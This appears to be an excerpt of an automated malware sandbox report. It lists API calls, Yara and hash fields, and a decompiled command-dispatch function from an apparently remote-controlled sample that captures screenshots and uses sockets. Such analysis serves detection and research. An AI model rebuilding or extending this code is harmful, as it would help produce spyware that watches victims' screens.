                                    • Part of subcall function 00402118: CreateThread.KERNEL32(00000000,00000000,00402137,?,00000000,00000000), ref: 0040212D
                                    • Part of subcall function 004127F5: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,0040464E,?,?,00000055), ref: 00412804
                                    • Part of subcall function 004127F5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041280E
                                    • Part of subcall function 004127F5: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,0040464E,?,?,00000055), ref: 00412817
                                    • Part of subcall function 004127F5: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 00412821
                                    • Part of subcall function 004127F5: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041282B
                                    • Part of subcall function 004127F5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,00000055), ref: 00412841
                                    • Part of subcall function 004127F5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000055), ref: 0041284A
                                    • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                    • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,?,0041B310,?,0041B310,0041C0C8,0041B310,00000000,00000000,?,?,?,0041BF08), ref: 0040F7EF
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,0041BF08), ref: 0040F7FF
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,0041BF08), ref: 0040F80F
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,0041BF08), ref: 0040F81F
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,0041BF08), ref: 0040F82C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040F83C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040F84C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000010), ref: 0040F86D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F879
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F882
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F88E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F89A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F8A6
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F8B2
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F8BE
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040F856
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000004D,?,?,?,?,?,?), ref: 0040F900
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040F909
                                    • Part of subcall function 0040F984: GdipDisposeImage.GDIPLUS(?,00410AE2), ref: 0040F98D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@V10@0@$Create$D@1@@$?size@?$basic_string@G@2@@std@@G@std@@V01@@$?begin@?$basic_string@?c_str@?$basic_string@Stream_itoa$?end@?$basic_string@?length@?$basic_string@CompatibleDisposeGdipImageThreadV10@@connectsocket
                                  • String ID: image/jpeg
                                  • API String ID: 1042780377-3785015651
                                  • Opcode ID: 3f767a8e3f93650d7b3944b411ef26bd8ce0f52d5284a6ecbfda72a0d1101bb8
                                  • Instruction ID: 2cf9f006c0d4929ef9c332e6db0d7f76cf60b2cff1cc21eb26a78d91115eee6c
                                  • Opcode Fuzzy Hash: 3f767a8e3f93650d7b3944b411ef26bd8ce0f52d5284a6ecbfda72a0d1101bb8
                                  • Instruction Fuzzy Hash: 74915172900109ABDB10EFA1DC49EEF7B7CEF54304F00847AF916A7191EB745A49CBA9
                                  Uniqueness
                                  Uniqueness Score: -1.00%
                                  APIs
                                  • _EH_prolog.MSVCRT ref: 00410B20
                                  • GdiplusStartup.GDIPLUS(0041BF18,?,00000000,00000000,00000000,00000000), ref: 00410B59
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00410B79
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410B85
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0000001A), ref: 00410BAA
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000019,00000000), ref: 00410BBC
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00410BDC
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410BE8
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410BF4
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00410BFD
                                  • CreateDirectoryW.KERNEL32(00000000), ref: 00410C04
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00410C17
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00410C2A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00415898), ref: 00410C89
                                  • Sleep.KERNEL32(000003E8), ref: 00410CA6
                                  • GetLocalTime.KERNEL32(?), ref: 00410CB1
                                  • swprintf.MSVCRT(?,00416AC0,?,?,?,?,?,?), ref: 00410CF4
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BFB8,00415A24,?,00415898), ref: 00410D1A
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415898), ref: 00410D2A
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,?,00415898), ref: 00410D3A
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,00415898), ref: 00410D49
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00415898), ref: 00410D55
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00415898), ref: 00410D61
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00415898), ref: 00410D6D
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,00415898), ref: 00410D7D
                                    • Part of subcall function 0041093F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00410D89,?,png,0041BCB0), ref: 00410958
                                    • Part of subcall function 0041093F: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00410963
                                    • Part of subcall function 0041093F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0041096E
                                    • Part of subcall function 0041093F: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00410989
                                    • Part of subcall function 0041093F: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410993
                                    • Part of subcall function 0041093F: SHCreateMemStream.SHLWAPI(00000000), ref: 0041099A
                                    • Part of subcall function 0041093F: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000,00000000,00000000), ref: 004109C2
                                    • Part of subcall function 0041093F: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,00000000), ref: 004109DF
                                    • Part of subcall function 0041093F: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004109F5
                                    • Part of subcall function 0041093F: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00410A02
                                    • Part of subcall function 0041093F: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00410A1B
                                    • Part of subcall function 0041093F: DeleteFileW.KERNEL32(00000000), ref: 00410A22
                                    • Part of subcall function 0041093F: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00410A2F
                                    • Part of subcall function 0041093F: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410A38
                                    • Part of subcall function 0041093F: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00410A4D
                                    • Part of subcall function 0041093F: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410A57
                                    • Part of subcall function 0041093F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00410D89,?,dat,?,00000000), ref: 00410A7F
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000015,?,?,?,?,?,?,?,00415898), ref: 00410D9B
                                  • atoi.MSVCRT ref: 00410DA2
                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00415898), ref: 00410DB0
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000018,?,?,?,?,?,?,?,00415898), ref: 00410DC9
                                  • atoi.MSVCRT ref: 00410DD0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$D@2@@std@@D@std@@$?c_str@?$basic_string@$??1?$basic_string@$??0?$basic_string@$G@1@@G@2@@0@Hstd@@V01@@V10@V?$basic_string@$??4?$basic_string@?data@?$basic_string@V01@$?size@?$basic_string@CreateSleepatoi$?length@?$basic_string@D@1@@DeleteDirectoryFileGdiplusH_prologLocalStartupStreamTimeswprintf
                                  • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                  • API String ID: 2994672083-3790400642
                                  • Opcode ID: 7c42cc7d4d28be9671bebd868501b0c52943684f992789d1d633ca31faaf5797
                                  • Instruction ID: 09d63aef6d3d8e876cb0f678efb75e9f291bc689162efedecff38abdc591dce5
                                  • Opcode Fuzzy Hash: 7c42cc7d4d28be9671bebd868501b0c52943684f992789d1d633ca31faaf5797
                                  • Instruction Fuzzy Hash: 9C71A37190061DEBCB15ABA0DC8DBEE7778AB84305F1480AAF509A7191EB784AC58F5C
                                  Uniqueness
                                  Uniqueness Score: -1.00%
                                  C-Code - Quality: 21%
                                  			E00410F04(intOrPtr* __eax, void* __eflags, char _a8) {
                                  				char _v20;
                                  				char _v24;
                                  				char _v40;
                                  				char _v56;
                                  				char _v72;
                                  				char _v88;
                                  				char _v104;
                                  				char _v120;
                                  				char _v136;
                                  				char _v152;
                                  				char _v168;
                                  				char _v184;
                                  				char _v200;
                                  				char _v216;
                                  				void* _t69;
                                  				void* _t74;
                                  				void* _t75;
                                  				void* _t76;
                                  				void* _t78;
                                  				char* _t83;
                                  				void* _t85;
                                  				void* _t86;
                                  				void* _t88;
                                  				char* _t92;
                                  				void* _t94;
                                  				void* _t95;
                                  				void* _t97;
                                  				char* _t101;
                                  				void* _t103;
                                  				void* _t104;
                                  				void* _t106;
                                  				char* _t110;
                                  				void* _t112;
                                  				char* _t118;
                                  				char* _t119;
                                  				char* _t120;
                                  				intOrPtr* _t123;
                                  				void* _t125;
                                  				void* _t127;
                                  				char* _t130;
                                  				char* _t135;
                                  				char* _t136;
                                  				char* _t137;
                                  				intOrPtr _t139;
                                  				void* _t230;
                                  				void* _t233;
                                  				void* _t235;
                                  				void* _t236;
                                  				void* _t241;
                                  				void* _t242;
                                  				void* _t247;
                                  				void* _t248;
                                  				void* _t253;
                                  				void* _t254;
                                  				void* _t264;
                                  				void* _t265;
                                  
                                  				__imp__??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z(0);
                                  				_t139 =  *__eax;
                                  				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z( *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
                                  				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z();
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                  				E004129EB(__eflags,  &_v20,  &_a8, 0x41b310,  &_v40,  &_v40, 1);
                                  				_t233 = _t230 + 0x24;
                                  				_t69 = _t139 - 1;
                                  				if(_t69 == 0) {
                                  					E00412855(_t233 - 0xc, _t233 - 0xc, E004113C9( &_v216));
                                  					E004020C2(0x41c130);
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(0x79);
                                  					L26:
                                  					_t74 = E004017DD( &_v20);
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					return _t74;
                                  				}
                                  				_t75 = _t69 - 1;
                                  				if(_t75 == 0) {
                                  					_t76 = E004119AD( &_v20, 0);
                                  					_t235 = _t233 - 0x10;
                                  					_push(_t76);
                                  					E00412881(_t76);
                                  					_t78 = E00411700(_t235);
                                  					_t236 = _t235 + 0x10;
                                  					__eflags = _t78;
                                  					if(_t78 == 0) {
                                  						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(E004119AD( &_v20, 0));
                                  						_push(0x80);
                                  						L14:
                                  						E004020C2(0x41c130);
                                  						goto L26;
                                  					}
                                  					_push(E004119AD( &_v20, 1));
                                  					_push(0x41b310);
                                  					_push(E004119AD( &_v20, 0));
                                  					_t83 =  &_v184;
                                  					_push(_t83);
                                  					L00414140();
                                  					_push(_t83);
                                  					L00414140();
                                  					E004020C2(0x41c130, 0x7a, _t236 - 0x10);
                                  					L23:
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					goto L26;
                                  				}
                                  				_t85 = _t75 - 1;
                                  				if(_t85 == 0) {
                                  					_t86 = E004119AD( &_v20, 0);
                                  					_t241 = _t233 - 0x10;
                                  					_push(_t86);
                                  					E00412881(_t86);
                                  					_t88 = E00411760(_t241);
                                  					_t242 = _t241 + 0x10;
                                  					__eflags = _t88;
                                  					if(_t88 == 0) {
                                  						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(E004119AD( &_v20, 0));
                                  						_push(0x81);
                                  						goto L14;
                                  					}
                                  					_push(E004119AD( &_v20, 1));
                                  					_push(0x41b310);
                                  					_push(E004119AD( &_v20, 0));
                                  					_t92 =  &_v152;
                                  					_push(_t92);
                                  					L00414140();
                                  					_push(_t92);
                                  					L00414140();
                                  					E004020C2(0x41c130, 0x7b, _t242 - 0x10);
                                  					goto L23;
                                  				}
                                  				_t94 = _t85 - 1;
                                  				if(_t94 == 0) {
                                  					_t95 = E004119AD( &_v20, 0);
                                  					_t247 = _t233 - 0x10;
                                  					_push(_t95);
                                  					E00412881(_t95);
                                  					_t97 = E00411859(_t247);
                                  					_t248 = _t247 + 0x10;
                                  					__eflags = _t97;
                                  					if(_t97 == 0) {
                                  						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(E004119AD( &_v20, 0));
                                  						_push(0x82);
                                  						goto L14;
                                  					}
                                  					_push(E004119AD( &_v20, 1));
                                  					_push(0x41b310);
                                  					_push(E004119AD( &_v20, 0));
                                  					_t101 =  &_v120;
                                  					_push(_t101);
                                  					L00414140();
                                  					_push(_t101);
                                  					L00414140();
                                  					E004020C2(0x41c130, 0x7c, _t248 - 0x10);
                                  					goto L23;
                                  				}
                                  				_t103 = _t94 - 1;
                                  				if(_t103 == 0) {
                                  					_t104 = E004119AD( &_v20, 0);
                                  					_t253 = _t233 - 0x10;
                                  					_push(_t104);
                                  					E00412881(_t104);
                                  					_t106 = E004118C0(_t253);
                                  					_t254 = _t253 + 0x10;
                                  					__eflags = _t106;
                                  					if(_t106 == 0) {
                                  						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(E004119AD( &_v20, 0));
                                  						_push(0x83);
                                  						goto L14;
                                  					}
                                  					_push(E004119AD( &_v20, 1));
                                  					_push(0x41b310);
                                  					_push(E004119AD( &_v20, 0));
                                  					_t110 =  &_v88;
                                  					_push(_t110);
                                  					L00414140();
                                  					_push(_t110);
                                  					L00414140();
                                  					E004020C2(0x41c130, 0x7d, _t254 - 0x10);
                                  					goto L23;
                                  				}
                                  				_t112 = _t103 - 1;
                                  				if(_t112 == 0) {
                                  					E00412881(_t113);
                                  					_v24 = E004117C7(_t233 - 0x10);
                                  					_t118 =  &_v72;
                                  					L00414140();
                                  					_t119 =  &_v136;
                                  					L00414140();
                                  					_t120 =  &_v56;
                                  					L00414140();
                                  					L0041417C();
                                  					E004020C2(0x41c130, 0x7f, _t233 - 0x10);
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t120, _t120, _t119, _t119, _t118, _t118, E004119AD( &_v20, 0), 0x41b310, E004119AD( &_v20, 1), 0x41b310, _v24, E004119AD( &_v20, 0));
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					goto L23;
                                  				}
                                  				if(_t112 != 1) {
                                  					goto L26;
                                  				}
                                  				_t123 = E004119AD( &_v20, 2);
                                  				__imp__??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z(0);
                                  				_push( *_t123);
                                  				_t125 = E004119AD( &_v20, 0);
                                  				_t264 = _t233 - 0x10;
                                  				_push(_t125);
                                  				_push(_t264);
                                  				E00412881(_t125);
                                  				_t127 = E00411927();
                                  				_t265 = _t264 + 0x14;
                                  				if(_t127 == 0) {
                                  					_push(E004119AD( &_v20, 1));
                                  					_push(0x41b310);
                                  					_push(E004119AD( &_v20, 0));
                                  					_t130 =  &_v104;
                                  					_push(_t130);
                                  					L00414140();
                                  					_push(_t130);
                                  					L00414140();
                                  					E004020C2(0x41c130, 0x84, _t265 - 0x10);
                                  				} else {
                                  					_t135 =  &_v200;
                                  					L00414140();
                                  					_t136 =  &_v168;
                                  					L00414140();
                                  					_t137 =  &_v40;
                                  					L00414140();
                                  					L00414140();
                                  					E004020C2(0x41c130, 0x7e, _t265 - 0x10);
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t137, _t137, _t136, _t136, _t135, _t135, E004119AD( &_v20, 0), 0x41b310, E004119AD( &_v20, 1), 0x41b310, E004119AD( &_v20, 2));
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				}
                                  				goto L23;
                                  			}
                                  0x00410f16
                                  0x00410f1c
                                  0x00410f2e
                                  0x00410f38
                                  0x00410f41
                                  0x00410f52
                                  0x00410f61
                                  0x00410f6b
                                  0x00410f73
                                  0x00410f76
                                  0x00410f77
                                  0x00411394
                                  0x004113a2
                                  0x004113ad
                                  0x004113b3
                                  0x004113b6
                                  0x004113be
                                  0x004113c8
                                  0x004113c8
                                  0x00410f7d
                                  0x00410f7e
                                  0x004112f5
                                  0x004112fa
                                  0x004112ff
                                  0x00411301
                                  0x00411308
                                  0x0041130d
                                  0x00411310
                                  0x00411312
                                  0x00411371
                                  0x00411377
                                  0x004111ce
                                  0x004111d3
                                  0x00000000
                                  0x004111d3
                                  0x00411326
                                  0x00411327
                                  0x0041132e
                                  0x0041132f
                                  0x00411335
                                  0x00411336
                                  0x0041133e
                                  0x00411340
                                  0x0041134f
                                  0x0041135a
                                  0x0041135a
                                  0x00000000
                                  0x0041135a
                                  0x00410f84
                                  0x00410f85
                                  0x00411268
                                  0x0041126d
                                  0x00411272
                                  0x00411274
                                  0x0041127b
                                  0x00411280
                                  0x00411283
                                  0x00411285
                                  0x004112e1
                                  0x004112e7
                                  0x00000000
                                  0x004112e7
                                  0x00411299
                                  0x0041129a
                                  0x004112a1
                                  0x004112a2
                                  0x004112a8
                                  0x004112a9
                                  0x004112b1
                                  0x004112b3
                                  0x004112c2
                                  0x00000000
                                  0x004112c7
                                  0x00410f8b
                                  0x00410f8c
                                  0x004111e1
                                  0x004111e6
                                  0x004111eb
                                  0x004111ed
                                  0x004111f4
                                  0x004111f9
                                  0x004111fc
                                  0x004111fe
                                  0x00411254
                                  0x0041125a
                                  0x00000000
                                  0x0041125a
                                  0x00411212
                                  0x00411213
                                  0x0041121a
                                  0x0041121b
                                  0x0041121e
                                  0x0041121f
                                  0x00411227
                                  0x00411229
                                  0x00411238
                                  0x00000000
                                  0x0041123d
                                  0x00410f92
                                  0x00410f93
                                  0x00411150
                                  0x00411155
                                  0x0041115a
                                  0x0041115c
                                  0x00411163
                                  0x00411168
                                  0x0041116b
                                  0x0041116d
                                  0x004111c3
                                  0x004111c9
                                  0x00000000
                                  0x004111c9
                                  0x00411181
                                  0x00411182
                                  0x00411189
                                  0x0041118a
                                  0x0041118d
                                  0x0041118e
                                  0x00411196
                                  0x00411198
                                  0x004111a7
                                  0x00000000
                                  0x004111ac
                                  0x00410f99
                                  0x00410f9a
                                  0x004110c5
                                  0x004110d1
                                  0x004110f0
                                  0x004110f4
                                  0x004110fd
                                  0x00411104
                                  0x0041110d
                                  0x00411111
                                  0x0041111b
                                  0x0041112a
                                  0x00411132
                                  0x0041113e
                                  0x00000000
                                  0x00411144
                                  0x00410fa1
                                  0x00000000
                                  0x00000000
                                  0x00410fad
                                  0x00410fb4
                                  0x00410fbf
                                  0x00410fc1
                                  0x00410fc6
                                  0x00410fcb
                                  0x00410fcc
                                  0x00410fcd
                                  0x00410fd4
                                  0x00410fd9
                                  0x00410fde
                                  0x0041107f
                                  0x00411080
                                  0x00411087
                                  0x00411088
                                  0x0041108b
                                  0x0041108c
                                  0x00411094
                                  0x00411096
                                  0x004110a8
                                  0x00410fe4
                                  0x0041100b
                                  0x00411012
                                  0x0041101b
                                  0x00411022
                                  0x0041102b
                                  0x0041102f
                                  0x00411039
                                  0x00411048
                                  0x00411050
                                  0x0041105c
                                  0x00411062
                                  0x00000000

                                  APIs
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 00410F16
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000001,6B015DF0), ref: 00410F2E
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00410F38
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410F41
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00410F52
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00410F61
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
